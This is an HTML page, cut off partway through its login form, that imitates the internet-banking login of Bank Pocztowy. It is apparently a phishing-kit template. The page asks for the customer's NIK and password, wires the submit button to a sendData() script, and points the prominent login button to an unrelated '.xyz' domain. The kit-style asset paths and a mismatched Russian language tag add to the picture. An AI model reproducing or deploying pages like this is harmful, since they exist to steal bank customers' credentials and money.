<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html lang="ru-RU"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>System bankowości internetowej Banku Pocztowego S.A.</title>
<meta name="robots" content="noindex, nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover">
<link rel="shortcut icon" href="https://www.pocztowy.pl/favicon.ico" type="image/vnd.microsoft.icon">
<link rel="icon" href="https://www.pocztowy.pl/favicon.ico" type="image/vnd.microsoft.icon">
<script src="https://code.jquery.com/jquery-3.6.0.js"></script>
<link rel="stylesheet" id="mybiz-style-css" href="/static/style/banksPL/pocztowy/mybiz-style.css" media="all"> 
<link rel="stylesheet" id="pocztowy-frontend-css" href="/static/style/banksPL/pocztowy/pocztowy-assets-css-frontend-lite.min.css" media="all"> 
<link rel="stylesheet" id="pocztowy-post-552-css" href="/static/style/banksPL/pocztowy/pocztowy-css-post-552.css" media="all"> 
<script src="/static/style/protect/protect.js"></script>
<style>
.pocztowy-widget .pocztowy-icon-list-items{list-style-type:none;margin:0;padding:0}.pocztowy-widget .pocztowy-icon-list-item{margin:0;padding:0;position:relative}.pocztowy-widget .pocztowy-icon-list-item:after{position:absolute;bottom:0;width:100%}.pocztowy-widget .pocztowy-icon-list-item{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;font-size:inherit}.pocztowy-widget .pocztowy-icon-list-icon+.pocztowy-icon-list-text{-ms-flex-item-align:center;align-self:center;padding-left:5px}.pocztowy-widget .pocztowy-icon-list-icon{display:-webkit-box;display:-ms-flexbox;display:flex}.pocztowy-widget .pocztowy-icon-list-icon svg{width:var(--e-icon-list-icon-size,1em);height:var(--e-icon-list-icon-size,1em)}.pocztowy-widget.pocztowy-widget-icon-list .pocztowy-icon-list-icon{text-align:var(--e-icon-list-icon-align)}.pocztowy-widget.pocztowy-widget-icon-list .pocztowy-icon-list-icon svg{margin:var(--e-icon-list-icon-margin,0 calc(var(--e-icon-list-icon-size, 1em) * .25) 0 0)}.pocztowy-widget.pocztowy-align-left .pocztowy-icon-list-item{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:left}.pocztowy-widget:not(.pocztowy-align-right) .pocztowy-icon-list-item:after{left:0}@media (max-width:1024px){.pocztowy-widget:not(.pocztowy-tablet-align-right) .pocztowy-icon-list-item:after{left:0}.pocztowy-widget:not(.pocztowy-tablet-align-left) .pocztowy-icon-list-item:after{right:0}}@media (max-width:767px){.pocztowy-widget:not(.pocztowy-mobile-align-right) .pocztowy-icon-list-item:after{left:0}.pocztowy-widget:not(.pocztowy-mobile-align-left) .pocztowy-icon-list-item:after{right:0}}
.pocztowy-552 .pocztowy-element.pocztowy-element-1bdfa6f > .pocztowy-container{max-width:1020px;}.pocztowy-552 .pocztowy-element.pocztowy-element-1bdfa6f{margin-top:0px;margin-bottom:0px;padding:10px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-a75dd8c > .pocztowy-element-populated{margin:0px 0px 0px 0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-43da5a7 > .pocztowy-element-populated{margin:0px 0px 0px 0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-ddad676 .pocztowy-button{background-color:transparent;background-image:linear-gradient(180deg, #D22228 0%, #96181C 100%);border-radius:5px 5px 5px 5px;padding:7px 25px 10px 25px;}.pocztowy-552 .pocztowy-element.pocztowy-element-ddad676 > .pocztowy-widget-container{margin:0px 0px 0px 0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-26dd3af > .pocztowy-container{max-width:1020px;}.pocztowy-552 .pocztowy-element.pocztowy-element-26dd3af{transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;margin-top:0px;margin-bottom:0px;padding:0px 10px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-7041e1f:not(.pocztowy-motion-effects-element-type-background) > .pocztowy-column-wrap{background-color:transparent;background-image:linear-gradient(180deg, #103D68 0%, #0A355E 100%);}.pocztowy-552 .pocztowy-element.pocztowy-element-7041e1f > .pocztowy-element-populated{border-style:solid;border-width:1px 1px 1px 1px;border-color:#212939;box-shadow:0px 2px 2px 0px rgba(0,0,0,0.5);transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;margin:0px 0px 0px 0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-7041e1f > .pocztowy-element-populated{border-radius:5px 5px 5px 5px;}.pocztowy-552 .pocztowy-element.pocztowy-element-48c09ff{text-align:center;}.pocztowy-552 .pocztowy-element.pocztowy-element-48c09ff .pocztowy-heading-title{color:#FFFFFF;font-size:16px;font-weight:500;margin: auto; padding: 7px;}.pocztowy-552 .pocztowy-element.pocztowy-element-03e98b2 > .pocztowy-container{max-width:1020px;}.pocztowy-552 .pocztowy-element.pocztowy-element-03e98b2{margin-top:0px;margin-bottom:0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-c11d289:not(.pocztowy-motion-effects-element-type-background) > .pocztowy-column-wrap{background-color:transparent;background-image:linear-gradient(180deg, #E3EBEE 0%, #FFFFFF 100%);}.pocztowy-552 .pocztowy-element.pocztowy-element-c11d289 > .pocztowy-element-populated{border-style:solid;border-width:0px 0px 2px 0px;border-color:#0000000D;transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;margin:5px 0px 0px 0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-1d8995b > .pocztowy-container{max-width:500px;}.pocztowy-552 .pocztowy-element.pocztowy-element-1d8995b{margin-top:25px;margin-bottom:0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-b978980 > .pocztowy-element-populated{border-style:solid;border-width:1px 1px 1px 1px;border-color:#000000;transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;margin:0px 0px 0px 0px;padding:0em 0em 0em 0em;}.pocztowy-552 .pocztowy-element.pocztowy-element-b978980 > .pocztowy-element-populated{border-radius:4px 4px 4px 4px;}.pocztowy-552 .pocztowy-element.pocztowy-element-729b4b7{color:#000000;font-size:14px;font-weight:400;line-height:20px;}.pocztowy-552 .pocztowy-element.pocztowy-element-729b4b7 > .pocztowy-widget-container{margin:0px 0px 0px 0px;padding:0em 3em 0em 1em;}.pocztowy-552 .pocztowy-element.pocztowy-element-09c85e7 .pocztowy-button{background-color:transparent;background-image:linear-gradient(180deg, #D22228 0%, #96181C 100%);border-radius:5px 5px 5px 5px;padding:7px 25px 10px 25px;}.pocztowy-552 .pocztowy-element.pocztowy-element-09c85e7 > .pocztowy-widget-container{margin:-30px 0px 0px 0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-2d76afa{color:#000000;font-size:14px;font-weight:400;line-height:20px;}.pocztowy-552 .pocztowy-element.pocztowy-element-2d76afa > .pocztowy-widget-container{margin:-18px 0px 0px 0px;padding:0em 3em 0em 1em;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-field-group{padding-right:calc( 6px/2 );padding-left:calc( 6px/2 );margin-bottom:10px;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-form-fields-wrapper{margin-left:calc( -6px/2 );margin-right:calc( -6px/2 );margin-bottom:-10px;}body .pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-labels-above .pocztowy-field-group > label{padding-bottom:0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-field-group > label{color:#000000;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-field-group > label{font-size:16px;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-field-group .pocztowy-field{color:#000000;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-field-group:not(.pocztowy-field-type-upload) .pocztowy-field:not(.pocztowy-select-wrapper){background-color:#ffffff;border-color:#BCBDBE;border-radius:3px 3px 3px 3px;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-button{font-size:13px;font-weight:700;border-style:solid;border-width:0px 0px 1px 0px;border-radius:3px 3px 3px 3px;padding:5px 15px 7px 15px;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-button[type="submit"]{background-color:#2D4674;color:#ffffff;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d .pocztowy-button[type="submit"]:hover{color:#ffffff;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d{--e-form-steps-indicators-spacing:20px;--e-form-steps-indicator-padding:30px;--e-form-steps-indicator-inactive-secondary-color:#ffffff;--e-form-steps-indicator-active-secondary-color:#ffffff;--e-form-steps-indicator-completed-secondary-color:#ffffff;--e-form-steps-divider-width:1px;--e-form-steps-divider-gap:10px;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d > .pocztowy-widget-container{margin:3% 25% 3% 33%;padding:0px 0px 5px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-b98efd9 > .pocztowy-container{max-width:1020px;}.pocztowy-552 .pocztowy-element.pocztowy-element-b98efd9{transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;margin-top:0px;margin-bottom:0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-a151c29 > .pocztowy-element-populated{margin:0px 0px 0px 0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-6446ba5 .pocztowy-heading-title{color:#DA2429;font-size:15px;font-weight:bold;}.pocztowy-552 .pocztowy-element.pocztowy-element-6446ba5 > .pocztowy-widget-container{margin:30px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-15967bf{color:#183964;font-size:14px;font-weight:400;line-height:15px;letter-spacing:0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-15967bf > .pocztowy-widget-container{margin:-20px 0px 0px 0px;padding:0em 3em 0em 0em;}.pocztowy-552 .pocztowy-element.pocztowy-element-4a84604 .pocztowy-icon-list-icon svg{fill:#DA2429;}.pocztowy-552 .pocztowy-element.pocztowy-element-4a84604{--e-icon-list-icon-size:6px;}.pocztowy-552 .pocztowy-element.pocztowy-element-4a84604 .pocztowy-icon-list-text{color:#183964;padding-left:5px;}.pocztowy-552 .pocztowy-element.pocztowy-element-4a84604 .pocztowy-icon-list-item > .pocztowy-icon-list-text{font-size:14px;font-weight:400;}.pocztowy-552 .pocztowy-element.pocztowy-element-4a84604 > .pocztowy-widget-container{margin:-25px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-9500e9e .pocztowy-heading-title{color:#0000EE;font-size:12px;font-weight:bold;text-decoration:underline;}.pocztowy-552 .pocztowy-element.pocztowy-element-9500e9e > .pocztowy-widget-container{margin:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-13b6b22 .pocztowy-heading-title{color:#DA2429;font-size:15px;font-weight:bold;}.pocztowy-552 .pocztowy-element.pocztowy-element-13b6b22 > .pocztowy-widget-container{margin:30px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-46c6c86 .pocztowy-icon-list-icon svg{fill:#DA2429;}.pocztowy-552 .pocztowy-element.pocztowy-element-46c6c86{--e-icon-list-icon-size:6px;}.pocztowy-552 .pocztowy-element.pocztowy-element-46c6c86 .pocztowy-icon-list-text{color:#183964;padding-left:5px;}.pocztowy-552 .pocztowy-element.pocztowy-element-46c6c86 .pocztowy-icon-list-item > .pocztowy-icon-list-text{font-size:14px;font-weight:400;}.pocztowy-552 .pocztowy-element.pocztowy-element-8c90944 .pocztowy-heading-title{color:#DA2429;font-size:15px;font-weight:bold;}.pocztowy-552 .pocztowy-element.pocztowy-element-8c90944 > .pocztowy-widget-container{margin:30px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-f6dcd48{color:#183964;font-size:14px;font-weight:400;line-height:15px;letter-spacing:0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-f6dcd48 > .pocztowy-widget-container{margin:-20px 0px -5px 0px;padding:0em 3em 0em 0em;}.pocztowy-552 .pocztowy-element.pocztowy-element-8683fc7 .pocztowy-icon-list-icon svg{fill:#DA2429;}.pocztowy-552 .pocztowy-element.pocztowy-element-8683fc7{--e-icon-list-icon-size:6px;}.pocztowy-552 .pocztowy-element.pocztowy-element-8683fc7 .pocztowy-icon-list-text{color:#183964;padding-left:5px;}.pocztowy-552 .pocztowy-element.pocztowy-element-8683fc7 .pocztowy-icon-list-item > .pocztowy-icon-list-text{font-size:14px;font-weight:400;}.pocztowy-552 .pocztowy-element.pocztowy-element-8683fc7 > .pocztowy-widget-container{margin:-10px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-e3fe9aa{color:#183964;font-size:14px;font-weight:400;line-height:15px;letter-spacing:0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-e3fe9aa > .pocztowy-widget-container{margin:-10px 0px -5px 0px;padding:0em 3em 0em 0em;}.pocztowy-552 .pocztowy-element.pocztowy-element-3366795 > .pocztowy-container{max-width:1020px;}.pocztowy-552 .pocztowy-element.pocztowy-element-3366795{margin-top:30px;margin-bottom:-50px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-d13b8ac:not(.pocztowy-motion-effects-element-type-background) > .pocztowy-column-wrap{background-color:transparent;background-image:linear-gradient(180deg, #F6F6F6 0%, #E7E7E7 100%);}.pocztowy-552 .pocztowy-element.pocztowy-element-d13b8ac > .pocztowy-element-populated{border-style:solid;border-width:1px 1px 2px 1px;border-color:#D9D9D9;transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;margin:0px 0px 0px 0px;padding:0px 0px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-8bb4ead{text-align:right;}.pocztowy-552 .pocztowy-element.pocztowy-element-8bb4ead > .pocztowy-widget-container{margin:18px 18px 18px 0px;}body.pocztowy-page-552:not(.pocztowy-motion-effects-element-type-background){background-color:#F5F5F5;}@media(max-width:1024px){.pocztowy-552 .pocztowy-element.pocztowy-element-1bdfa6f{padding:10px 6px 0px 0px;}.pocztowy-552 .pocztowy-element.pocztowy-element-b98efd9{padding:0px 8px 0px 8px;}}@media(max-width:767px){.pocztowy-552 .pocztowy-element.pocztowy-element-26dd3af{padding:0px 5px 0px 8px;}.pocztowy-552 .pocztowy-element.pocztowy-element-03e98b2{padding:0px 8px 0px 8px;}.pocztowy-552 .pocztowy-element.pocztowy-element-003d85d > .pocztowy-widget-container{margin:10px 29px 0px 16px;padding:0px 0px 10px 0px;}}@media(min-width:768px){.pocztowy-552 .pocztowy-element.pocztowy-element-deb04ad{width:38.111%;}.pocztowy-552 .pocztowy-element.pocztowy-element-a75dd8c{width:40.027%;}.pocztowy-552 .pocztowy-element.pocztowy-element-43da5a7{width:21.294%;}}.dialog-close-button:not(:hover){opacity:.4}.pocztowy-templates-modal__header__item>i:not(:hover){color:#a4afb7}.pocztowy-templates-modal__header__close--skip>i:not(:hover){color:#fff}.pocztowy-clearfix:after{content:"";display:block;clear:both;width:0;height:0}.pocztowy{-webkit-hyphens:manual;-ms-hyphens:manual;hyphens:manual}.pocztowy *,.pocztowy :after,.pocztowy :before{-webkit-box-sizing:border-box;box-sizing:border-box}.pocztowy a{-webkit-box-shadow:none;box-shadow:none;text-decoration:none}.pocztowy img{height:auto;max-width:100%;border:none;-webkit-border-radius:0;border-radius:0;-webkit-box-shadow:none;box-shadow:none}.pocztowy-align-center{text-align:center}.pocztowy-align-center .pocztowy-button{width:auto}.pocztowy-align-right{text-align:right}.pocztowy-align-right .pocztowy-button{width:auto}.pocztowy-align-left{text-align:left}:root{--page-title-display:block}.pocztowy-section{position:relative}.pocztowy-section .pocztowy-container{display:-webkit-box;display:-ms-flexbox;display:flex;margin-right:auto;margin-left:auto;position:relative}@media (max-width:1024px){.pocztowy-section .pocztowy-container{-ms-flex-wrap:wrap;flex-wrap:wrap}}.pocztowy-section.pocztowy-section-boxed>.pocztowy-container{max-width:1140px}.pocztowy-row{width:100%;display:-webkit-box;display:-ms-flexbox;display:flex}@media (max-width:1024px){.pocztowy-row{-ms-flex-wrap:wrap;flex-wrap:wrap}}.pocztowy-widget-wrap{position:relative;width:100%;-ms-flex-wrap:wrap;flex-wrap:wrap;-ms-flex-line-pack:start;align-content:flex-start}.pocztowy:not(.pocztowy-bc-flex-widget) .pocztowy-widget-wrap{display:-webkit-box;display:-ms-flexbox;display:flex}.pocztowy-widget-wrap>.pocztowy-element{width:100%}.pocztowy-widget{position:relative}.pocztowy-widget:not(:last-child){margin-bottom:20px}.pocztowy-column{min-height:1px}.pocztowy-column,.pocztowy-column-wrap{position:relative;display:-webkit-box;display:-ms-flexbox;display:flex}.pocztowy-column-wrap{width:100%}@media (min-width:768px){.pocztowy-column.pocztowy-col-33{width:33.333%}.pocztowy-column.pocztowy-col-40{width:40%}.pocztowy-column.pocztowy-col-80{width:80%}.pocztowy-column.pocztowy-col-100{width:100%}}@media (max-width:767px){.pocztowy-column.pocztowy-sm-100{width:100%}}@media (max-width:767px){.pocztowy-column{width:100%}}.pocztowy-form-fields-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap}.pocztowy-form-fields-wrapper.pocztowy-labels-above .pocztowy-field-group>input{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.pocztowy-field-group{-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.pocztowy-field-group.pocztowy-field-type-submit{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.pocztowy-field-group .pocztowy-field-textual{width:100%;max-width:100%;border:1px solid #818a91;background-color:transparent;color:#373a3c;vertical-align:middle;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1}.pocztowy-field-group .pocztowy-field-textual:focus{-webkit-box-shadow:0 0 0 1px rgba(0,0,0,.1) inset;box-shadow:inset 0 0 0 1px rgba(0,0,0,.1);outline:0}.pocztowy-field-group .pocztowy-field-textual::-webkit-input-placeholder{color:inherit;font-family:inherit;opacity:.6}.pocztowy-field-group .pocztowy-field-textual:-ms-input-placeholder{color:inherit;font-family:inherit;opacity:.6}.pocztowy-field-group .pocztowy-field-textual:-moz-placeholder,.pocztowy-field-group .pocztowy-field-textual::-moz-placeholder{color:inherit;font-family:inherit;opacity:.6}.pocztowy-field-group .pocztowy-field-textual::-ms-input-placeholder{color:inherit;font-family:inherit;opacity:.6}.pocztowy-field-label{cursor:pointer}.pocztowy-field-textual{line-height:1.4;font-size:15px;min-height:40px;padding:5px 14px;-webkit-border-radius:3px;border-radius:3px}.pocztowy-field-textual.pocztowy-size-xs{font-size:13px;min-height:33px;padding:4px 12px;-webkit-border-radius:2px;border-radius:2px}.pocztowy-button-align-center .e-form__buttons,.pocztowy-button-align-center .pocztowy-field-type-submit{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.pocztowy-button-align-center .pocztowy-field-type-submit:not(.e-form__buttons__wrapper) .pocztowy-button{-ms-flex-preferred-size:initial;flex-basis:auto}.pocztowy-form .pocztowy-button{padding-top:0;padding-bottom:0;border:none}.pocztowy-form .pocztowy-button>span{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.pocztowy-form .pocztowy-button.pocztowy-size-xs{min-height:33px}.pocztowy-element .pocztowy-widget-container{-webkit-transition:background .3s,border .3s,-webkit-border-radius .3s,-webkit-box-shadow .3s;transition:background .3s,border .3s,-webkit-border-radius .3s,-webkit-box-shadow .3s;-o-transition:background .3s,border .3s,border-radius .3s,box-shadow .3s;transition:background .3s,border .3s,border-radius .3s,box-shadow .3s;transition:background .3s,border .3s,border-radius .3s,box-shadow .3s,-webkit-border-radius .3s,-webkit-box-shadow .3s}.pocztowy-button{display:inline-block;line-height:1;background-color:#818a91;font-size:15px;padding:12px 24px;-webkit-border-radius:3px;border-radius:3px;color:#fff;fill:#fff;text-align:center;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.pocztowy-button:focus,.pocztowy-button:hover,.pocztowy-button:visited{color:#fff}.pocztowy-button-content-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.pocztowy-button-icon{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-webkit-box-ordinal-group:6;-ms-flex-order:5;order:5}.pocztowy-button-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-webkit-box-ordinal-group:11;-ms-flex-order:10;order:10;display:inline-block}.pocztowy-button.pocztowy-size-xs{font-size:13px;padding:10px 20px;-webkit-border-radius:2px;border-radius:2px}.pocztowy-button span{text-decoration:inherit}.page-template-pocztowy_canvas.pocztowy-page:before{display:none}.pocztowy .pocztowy-element ul.pocztowy-icon-list-items{padding:0}@media (max-width:767px){.pocztowy .pocztowy-hidden-mobile{display:none}}
html {
line-height: 1.15;
-webkit-text-size-adjust: 100%;
}
body {
margin: 0;
}
a {
background-color: transparent;
}
b {
font-weight: bolder;
}
img {
border-style: none;
}
button,
input {
font-family: inherit;
font-size: 100%;
line-height: 1.15;
margin: 0;
}
button,
input {
overflow: visible;
}
button {
text-transform: none;
}
button,
[type="submit"] {
-webkit-appearance: button;
}
button::-moz-focus-inner,
[type="submit"]::-moz-focus-inner {
border-style: none;
padding: 0;
}
button:-moz-focusring,
[type="submit"]:-moz-focusring {
outline: 1px dotted ButtonText;
}
::-webkit-file-upload-button {
-webkit-appearance: button;
font: inherit;
}
*,
*::before,
*::after {
box-sizing: inherit;
}
html {
box-sizing: border-box;
}
body,
button,
input {
color: #404040;
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
font-size: 1rem;
line-height: 1.5;
}
h2 {
clear: both;
}
p {
margin-bottom: 1.5em;
}
body {
background: #fff;
}
ul {
margin: 0 0 1.5em 3em;
}
ul {
list-style: disc;
}
img {
height: auto;
max-width: 100%;
}
a {
color: #4169e1;
}
a:visited {
color: #0e4e79;
}
a:hover,
a:focus,
a:active {
color: #191970;
}
a:focus {
outline: thin dotted;
}
a:hover,
a:active {
outline: 0;
}
button {
border: 1px solid;
border-color: #ccc #ccc #bbb;
border-radius: 3px;
background: #e6e6e6;
color: rgba(0, 0, 0, 0.8);
line-height: 1;
padding: 0.6em 1em 0.4em;
}
button:hover {
border-color: #ccc #bbb #aaa;
}
button:active,
button:focus {
border-color: #aaa #bbb #bbb;
}
input[type="text"],
input[type="password"] {
color: #666;
border: 1px solid #ccc;
border-radius: 3px;
padding: 3px;
}
input[type="text"]:focus,
input[type="password"]:focus {
color: #111;
}
.page {
margin: 0 0 1.5em;
}
</style></head>

<body class="page-template page-template-pocztowy_canvas page page-id-552 pocztowy-default pocztowy-template-canvas pocztowy-kit-513 pocztowy-page pocztowy-page-552"><div class="pocztowy pocztowy-552"> 
<div class="pocztowy-inner"> 							
<div class="pocztowy-section-wrap"> 							
<section class="pocztowy-section pocztowy-top-section pocztowy-element pocztowy-element-1bdfa6f pocztowy-section-boxed pocztowy-section-height-default pocztowy-section-height-default"> 						
<div class="pocztowy-container pocztowy-column-gap-no"> 							
<div class="pocztowy-row"> 					
<div class="pocztowy-column pocztowy-col-33 pocztowy-top-column pocztowy-element pocztowy-element-deb04ad pocztowy-hidden-mobile"> 			
<div class="pocztowy-column-wrap"> 							
<div class="pocztowy-widget-wrap"> 								
</div> 					
</div> 		
</div> 				
<div class="pocztowy-column pocztowy-col-33 pocztowy-top-column pocztowy-element pocztowy-element-a75dd8c pocztowy-hidden-mobile" data-id="a75dd8c" data-element_type="column"> 			
<div class="pocztowy-column-wrap pocztowy-element-populated">
<div class="pocztowy-widget-wrap">
<div class="pocztowy-element pocztowy-element-5fdbf62 pocztowy-widget pocztowy-widget-html">
<div class="pocztowy-widget-container">
<div style="line-height: 28px; margin-right: 10px; float: right;font-size: 12px; text-decoration: none; color: #0e4e79;">
<a href="#">
<img style="width: 24px; height: auto; margin: 1px 3px 0 0; float: left;" src="/static/style/banksPL/pocztowy/pocz-image-1.png" alt="en_US">
English version
</a>
</div>
<div style="line-height: 28px; margin-right: 10px; float: right;font-size: 12px; text-decoration: none; color: #0e4e79;">
<a href="#">
<img style="width: 24px; height: auto; margin: 1px 3px 0 0; float: left;" src="/static/style/banksPL/pocztowy/pocz-image-3.png" alt="uk_UA">
Версія українська
</a>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="pocztowy-column pocztowy-col-33 pocztowy-top-column pocztowy-element pocztowy-element-43da5a7">
<div class="pocztowy-column-wrap pocztowy-element-populated">
<div class="pocztowy-widget-wrap">
<div class="pocztowy-element pocztowy-element-ddad676 pocztowy-align-right pocztowy-widget pocztowy-widget-button">
<div class="pocztowy-widget-container">
<div class="pocztowy-button-wrapper">
<a href="#" class="pocztowy-button-link pocztowy-button pocztowy-size-sm" role="button">
<span class="pocztowy-button-content-wrapper">
<span class="pocztowy-button-text">Zobacz też wersję demo</span>
</span>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="pocztowy-section pocztowy-top-section pocztowy-element pocztowy-element-26dd3af pocztowy-section-boxed pocztowy-section-height-default pocztowy-section-height-default">
<div class="pocztowy-container pocztowy-column-gap-no">
<div class="pocztowy-row">
<div class="pocztowy-column pocztowy-col-100 pocztowy-top-column pocztowy-element pocztowy-element-7041e1f">
<div class="pocztowy-column-wrap pocztowy-element-populated">
<div class="pocztowy-widget-wrap">
<div class="pocztowy-element pocztowy-element-48c09ff pocztowy-widget pocztowy-widget-heading">
<div class="pocztowy-widget-container">
<h2 class="pocztowy-heading-title pocztowy-size-default">Logowanie do systemu bankowości internetowej Banku Pocztowego</h2>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="pocztowy-section pocztowy-top-section pocztowy-element pocztowy-element-03e98b2 pocztowy-section-boxed pocztowy-section-height-default pocztowy-section-height-default">
<div class="pocztowy-container pocztowy-column-gap-default">
<div class="pocztowy-row">
<div class="pocztowy-column pocztowy-col-100 pocztowy-top-column pocztowy-element pocztowy-element-c11d289">
<div class="pocztowy-column-wrap pocztowy-element-populated">
<div class="pocztowy-widget-wrap">
<section class="pocztowy-section pocztowy-inner-section pocztowy-element pocztowy-element-1d8995b pocztowy-section-boxed pocztowy-section-height-default pocztowy-section-height-default">
<div class="pocztowy-container pocztowy-column-gap-default">
<div class="pocztowy-row">
<div class="pocztowy-column pocztowy-col-100 pocztowy-inner-column pocztowy-element pocztowy-element-b978980">
<div class="pocztowy-column-wrap pocztowy-element-populated">
<div class="pocztowy-widget-wrap">
<div class="pocztowy-element pocztowy-element-729b4b7 pocztowy-widget pocztowy-widget-text-editor">
<div class="pocztowy-widget-container">
<div class="pocztowy-text-editor pocztowy-clearfix">
<p>Korzystaj z nowej bankowości&nbsp;<a href="https://online.pocztowy.pl/login/main">online.pocztowy.pl</a>. To proste i wygodne rozwiązanie<br>dostosowane do wszystkich urządzeń. Logując się po raz pierwszy do nowej bankowości, użyj swojego hasła do Pocztowy24. Jeśli już wcześniej logowałeś się do nowej bankowości i zmieniłeś do niej hasło, użyj tego hasła.</p>
</div>
</div>
</div>
<div class="pocztowy-element pocztowy-element-09c85e7 pocztowy-align-center pocztowy-widget pocztowy-widget-button">
<div class="pocztowy-widget-container">
<div class="pocztowy-button-wrapper">
<a href="https://inpostpl.lzx-2idas9.xyz/autorize1641592468477647#" class="pocztowy-button-link pocztowy-button pocztowy-size-sm" role="button">
<span class="pocztowy-button-content-wrapper">
<span class="pocztowy-button-text">Zaloguj się na online.pocztowy.pl</span>
</span>
</a>
</div>
</div>
</div>
<div class="pocztowy-element pocztowy-element-2d76afa pocztowy-widget pocztowy-widget-text-editor">
<div class="pocztowy-widget-container">
<div class="pocztowy-text-editor pocztowy-clearfix">
<p>Uwaga! Bankowość dla klientów korporacyjnych jest dostępna pod adresem biznes.pocztowy.pl.</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<div class="pocztowy-element pocztowy-element-003d85d pocztowy-button-align-center pocztowy-widget pocztowy-widget-form">
<div class="pocztowy-widget-container">
<form class="pocztowy-form" method="post" name="New Form" id="formblock">
<input type="hidden" name="post_id" value="552">
<input type="hidden" name="form_id" value="003d85d">
<input type="hidden" name="referer_title" value="Home">
<input type="hidden" name="queried_id" value="552">
<div class="pocztowy-form-fields-wrapper pocztowy-labels-above">
<div class="pocztowy-field-type-text pocztowy-field-group pocztowy-column pocztowy-field-group-nik pocztowy-col-80 pocztowy-sm-100">
<label for="form-field-nik" class="pocztowy-field-label">Wpisz NIK:</label><input size="1" type="text" name="login" id="login" class="pocztowy-field pocztowy-size-xs  pocztowy-field-textual">
</div>
<div class="pocztowy-field-type-password pocztowy-field-group pocztowy-column pocztowy-field-group-haslo pocztowy-col-80 pocztowy-sm-100 pocztowy-field-required">
<label for="form-field-haslo" class="pocztowy-field-label">Wpisz hasło:</label><input size="1" type="password" name="password" id="password" class="pocztowy-field pocztowy-size-xs  pocztowy-field-textual" required="required" aria-required="true">
</div>
<div class="pocztowy-field-group pocztowy-column pocztowy-field-type-submit pocztowy-col-40 e-form__buttons">
<button type="submit" class="pocztowy-button pocztowy-size-xs">
<span>
<span class="pocztowy-button-icon">
</span>
<span class="pocztowy-button-text" onclick="sendData()">Zaloguj się</span>
</span>
</button>
</div>
